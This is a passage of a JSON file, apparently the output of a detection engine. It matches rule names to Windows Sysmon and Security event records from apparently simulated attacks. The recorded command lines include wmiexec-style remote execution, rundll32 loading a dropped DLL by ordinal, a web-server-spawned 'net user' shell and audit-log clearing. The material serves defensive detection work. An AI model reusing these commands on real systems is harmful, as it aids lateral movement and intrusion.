19:17:44.296"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":38294,"Execution_attributes":{"ProcessID":2956,"ThreadID":2088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-09-08T19:17:44.350762Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"%%SystemRoot%%\\PSEXESVC.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-64F9-5D75-0000-001038560000","ProcessId":576,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\PSEXESVC\\ImagePath","UtcTime":"2019-09-08 19:17:44.296"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":38295,"Execution_attributes":{"ProcessID":2956,"ThreadID":2088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-09-08T19:17:44.391389Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Remote PowerShell Session Host Process (WinRM)"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\HOSTNAME.EXE\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\administrator\\Documents\\","Description":"Hostname APP","FileVersion":"6.3.9600.16384 (winblue_rtm.130821-1623)","Hashes":"SHA1=4ED8B225C9CC97DD02C9A5DFD9F733C353F83E36,MD5=74D1E6E8AC6ABCC1DE934C8C5E422B64,SHA256=CA40BB9470E8E73767F3AA43DDF51F814481167DEC6C2FAA1996C18AB2C621DB,IMPHASH=65F157041816229C2919A683CBA86F70","Image":"C:\\Windows\\System32\\HOSTNAME.EXE","IntegrityLevel":"High","LogonGuid":"DFAE8213-BEAD-5CDC-0000-0020AFDA1500","LogonId":"0x15daaf","ParentCommandLine":"C:\\Windows\\system32\\wsmprovhost.exe -Embedding","ParentImage":"C:\\Windows\\System32\\wsmprovhost.exe","ParentProcessGuid":"DFAE8213-BEAD-5CDC-0000-0010DDDB1500","ParentProcessId":3332,"ProcessGuid":"DFAE8213-BF0B-5CDC-0000-00105A951600","ProcessId":2936,"Product":"Microsoft® Windows® Operating System","RuleName":"Lateral Movement - Windows Remote Management","TerminalSessionId":0,"User":"insecurebank\\Administrator","UtcTime":"2019-05-16 01:38:19.616"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1,"EventRecordID":18002,"Execution_attributes":{"ProcessID":1792,"ThreadID":2232},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-16T01:38:19.630865Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":566821,"Execution_attributes":{"ProcessID":780,"ThreadID":3480},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-19T00:02:00.383090Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x4fd77","SubjectUserName":"administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Call by Ordinal"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /Q /c c:\\windows\\system32\\rundll32.exe c:\\programdata\\7okjer,#1 1> \\\\127.0.0.1\\C$\\WqEVwJZYOe 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-75D0-5F8B-0000-0020A8A83300","LogonId":"0x33a8a8","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-75D1-5F8B-0000-00101DAB3300","ParentProcessId":2228,"ProcessGuid":"747F3D96-75D1-5F8B-0000-001088C23300","ProcessId":2784,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\Administrator","UtcTime":"2020-10-17 22:53:05.776"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":421227,"Execution_attributes":{"ProcessID":3236,"ThreadID":4832},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T22:53:05.777453Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-12-09 22:45:33.087","Image":"System","ProcessGuid":"747F3D96-CDE2-5FD1-0000-0010EB030000","ProcessId":4,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\onedrive.exe","UtcTime":"2020-12-09 22:45:33.087"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":549541,"Execution_attributes":{"ProcessID":3428,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-12-09T22:45:33.090853Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":2171289,"Execution_attributes":{"ProcessID":420,"ThreadID":996},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-02T11:47:39.499106Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"3B","SubjectLogonId":"0x38a14","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution Anomaly"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B0F2-5CC8-0000-00203D311D00","LogonId":"0x1d313d","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"365ABB72-B0C0-5CC8-0000-001017C31C00","ParentProcessId":836,"ProcessGuid":"365ABB72-B0F3-5CC8-0000-0010C43A1D00","ProcessId":2828,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:32:51.324"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9828,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:32:51.324839Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami /all ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B0F2-5CC8-0000-00203D311D00","LogonId":"0x1d313d","ParentCommandLine":"cmd.exe /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-B0F3-5CC8-0000-0010C43A1D00","ParentProcessId":2828,"ProcessGuid":"365ABB72-B0F3-5CC8-0000-0010373E1D00","ProcessId":3328,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:32:51.356"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9829,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:32:51.371714Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"747F3D96-2910-5F86-0000-00109EA10100","ProcessId":2892,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Shares\\staging","UtcTime":"2020-10-13 23:06:02.878"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":415266,"Execution_attributes":{"ProcessID":3336,"ThreadID":4516},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-13T23:06:02.889794Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"747F3D96-2910-5F86-0000-00109EA10100","ProcessId":2892,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Shares\\Security\\staging","UtcTime":"2020-10-13 23:06:02.878"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":415268,"Execution_attributes":{"ProcessID":3336,"ThreadID":4516},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-13T23:06:02.889886Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":1102,"EventRecordID":433307,"Execution_attributes":{"ProcessID":856,"ThreadID":1660},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-18T11:27:00.438449Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x18a7875","SubjectUserName":"user01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-82AE-607F-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":612,"ProcessGuid":"747F3D96-3A89-607F-0000-001028587700","ProcessId":4912,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2021-04-20 20:33:13.680"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":578503,"Execution_attributes":{"ProcessID":3392,"ThreadID":4112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-04-20T20:33:13.741579Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k LocalService -p -s fdPHost","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-82AF-607F-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":612,"ProcessGuid":"747F3D96-3A8A-607F-0000-0010E4717700","ProcessId":5280,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2021-04-20 20:33:14.246"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":578505,"Execution_attributes":{"ProcessID":3392,"ThreadID":4112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-04-20T20:33:14.273416Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32 url.dll,FileProtocolHandler ms-browser://","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-2842-5E1E-0000-0020FF3A7A00","LogonId":"0x7a3aff","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-2842-5E1E-0000-0010903C7A00","ParentProcessId":1628,"ProcessGuid":"747F3D96-2842-5E1E-0000-00100C417A00","ProcessId":4180,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-01-14 20:44:50.348"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":336,"Execution_attributes":{"ProcessID":1840,"ThreadID":8032},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-01-14T20:44:50.353148Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32 url.dll,OpenURL ms-browser://","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-28B3-5E1E-0000-002057EB7B00","LogonId":"0x7beb57","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-28B3-5E1E-0000-0010CAEC7B00","ParentProcessId":1632,"ProcessGuid":"747F3D96-28B3-5E1E-0000-00101DF17B00","ProcessId":3412,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-01-14 20:46:43.232"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":340,"Execution_attributes":{"ProcessID":1840,"ThreadID":8032},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-01-14T20:46:43.237922Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /all","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Documents\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5B3A-5CC7-0000-002096080100","LogonId":"0x10896","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -s -NoLogo -NoProfile","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-65A9-5CC7-0000-00104E5C2400","ParentProcessId":3376,"ProcessGuid":"365ABB72-65AA-5CC7-0000-00104D882400","ProcessId":2116,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-29 20:59:22.128"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8050,"Execution_attributes":{"ProcessID":1896,"ThreadID":1820},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-29T20:59:22.144046Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":1102,"EventRecordID":432901,"Execution_attributes":{"ProcessID":856,"ThreadID":2200},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-18T11:06:25.485214Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x18a7875","SubjectUserName":"user01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MSHTA Spwaned by SVCHOST"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\System32\\mshta.exe -Embedding","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft (R) HTML Application host","FileVersion":"11.00.9600.16428 (winblue_gdr.131013-1700)","Hashes":"SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A","Image":"C:\\Windows\\System32\\mshta.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-19E0-5CDA-0000-0020CE701000","LogonId":"0x1070ce","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-965E-5CDA-0000-0010AF760000","ParentProcessId":596,"ProcessGuid":"365ABB72-19E0-5CDA-0000-001006711000","ProcessId":1932,"Product":"Internet Explorer","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-14 01:29:04.293"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17589,"Execution_attributes":{"ProcessID":2000,"ThreadID":1960},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-14T01:29:04.306885Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Shells Spawned by Web Servers"],"event":{"Event":{"EventData":{"CommandLine":"\"c:\\windows\\system32\\cmd.exe\" /c net user","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\inetsrv\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-45C7-5CE7-0000-002092F99C00","LogonId":"0x9cf992","ParentCommandLine":"c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"DefaultAppPool\" -v \"v2.0\" -l \"webengine4.dll\" -a \\\\.\\pipe\\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h \"C:\\inetpub\\temp\\apppools\\DefaultAppPool\\DefaultAppPool.config\" -w \"\" -m 0 -t 20","ParentImage":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","ParentProcessGuid":"365ABB72-49D6-5CE7-0000-001020A7A700","ParentProcessId":2580,"ProcessGuid":"365ABB72-4A01-5CE7-0000-0010EE9DAC00","ProcessId":2404,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-24 